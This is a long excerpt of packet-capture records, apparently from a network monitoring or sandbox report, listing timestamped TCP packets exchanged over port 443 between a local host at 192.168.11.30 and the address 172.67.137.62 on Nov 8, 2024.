                                                                                      Nov 8, 2024 10:47:23.079452991 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.079504013 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.079947948 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.080115080 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.080125093 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.080178976 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.127741098 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.278879881 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.278897047 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.279053926 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.279202938 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.279212952 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.279330969 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.279460907 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.281325102 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.281338930 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.281533003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.281533003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.281543970 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.281594038 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.281594038 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.281707048 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.283181906 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.283193111 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.283387899 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.283387899 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.283399105 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.283489943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.283489943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.283595085 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301350117 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.301372051 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.301425934 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.301536083 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301536083 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301594973 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301605940 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.301618099 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301618099 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301618099 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301688910 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301775932 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.301779985 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301779985 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301791906 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.301884890 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.301894903 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.302026987 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302078009 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302103043 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.302169085 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302259922 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302261114 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302295923 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.302299023 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.302350044 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302400112 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302400112 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302400112 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302448988 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302448988 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302453995 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.302583933 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302632093 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302632093 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302635908 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.302730083 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302731037 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302781105 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302829027 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302829027 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302829027 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302877903 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302926064 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.302944899 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.303024054 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.303026915 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.303077936 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.303077936 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.303132057 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.303132057 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.303179026 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.303224087 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.303277016 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.303685904 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.303700924 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.303898096 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.303904057 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.303966045 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.305356979 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.305372000 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.305515051 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.305521965 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.305603027 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.305706024 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.306821108 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.306838036 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.307018042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.307065964 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.307212114 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.307214975 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.307260036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.309222937 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.309246063 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.309389114 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.309389114 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.309396029 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.309437037 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.309485912 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.309531927 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.311079979 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.311096907 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.311600924 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.311600924 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.311600924 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.311611891 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.311646938 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.311646938 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.311698914 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.312139034 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.312243938 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.312324047 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.312324047 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.312330961 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.312479973 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330219984 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.330239058 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.330343008 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.330415010 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330415010 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330426931 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.330431938 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.330441952 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330441952 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330542088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330542088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330542088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330542088 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330554008 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.330645084 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330645084 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330797911 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330806017 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.330813885 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.330849886 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330892086 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.330965996 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331023932 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.331059933 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331108093 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331108093 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331120014 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.331198931 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.331212044 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331212044 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331307888 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331314087 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.331357002 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331406116 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331454992 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331548929 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331599951 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331667900 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331667900 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331717014 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331762075 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331762075 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331815004 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.331815004 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.377624035 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531213045 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531230927 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531337976 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531356096 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531371117 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531402111 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531402111 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531409979 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531450033 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531548977 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531548977 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531563044 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531598091 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531603098 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531646967 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531698942 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531702995 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531745911 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531745911 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531745911 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531745911 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531749010 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531764030 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531793118 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531847954 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531852007 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.531892061 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531892061 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531991005 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.531991005 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.532589912 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.532603025 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.532740116 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.532805920 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.532805920 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.532810926 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.532852888 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.534645081 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.534662008 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.534745932 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.534751892 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.534796953 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.534796953 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.534846067 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.534894943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.534944057 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.536448002 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.536462069 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.536679983 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.536679983 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.536824942 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.536829948 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.536916971 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.538285017 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.538300991 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.538463116 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.538466930 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.538508892 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.538558006 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.538558006 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.540117979 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.540132999 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.540230036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.540277958 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.540277958 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.540285110 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.540328979 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.540328979 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.540376902 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.542200089 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.542217016 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.542363882 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.542363882 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.542370081 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.542413950 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.542506933 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.544234991 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.544255018 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.544378042 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.544428110 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.544428110 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.544533968 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.544538975 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.556968927 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.556988955 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.557073116 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.557104111 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557115078 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.557190895 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.557193041 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557193995 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557202101 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.557241917 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557291031 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557379007 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.557389021 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557389021 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557389021 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557395935 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.557436943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557534933 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557609081 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557610035 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.557657003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558274984 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.558288097 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.558336973 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.558415890 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558415890 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558422089 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.558463097 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558466911 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.558512926 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558512926 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558512926 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558623075 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558623075 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558675051 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558768988 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.558846951 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.559791088 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.559803963 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.559923887 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.559923887 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.560056925 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.560056925 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.560062885 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.560071945 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.560139894 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.560209036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.560209036 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.560214996 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.560257912 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.560257912 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.560306072 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.560360909 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.561662912 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.561676025 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.561798096 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.561844110 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.561844110 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.561844110 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.561850071 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.561893940 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.561944962 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.563553095 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.563662052 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.563745975 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.563745975 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.563752890 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.563793898 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.563904047 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.565216064 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.565228939 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:23.565372944 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:23.565372944 CET49777443192.168.11.30172.67.137.62
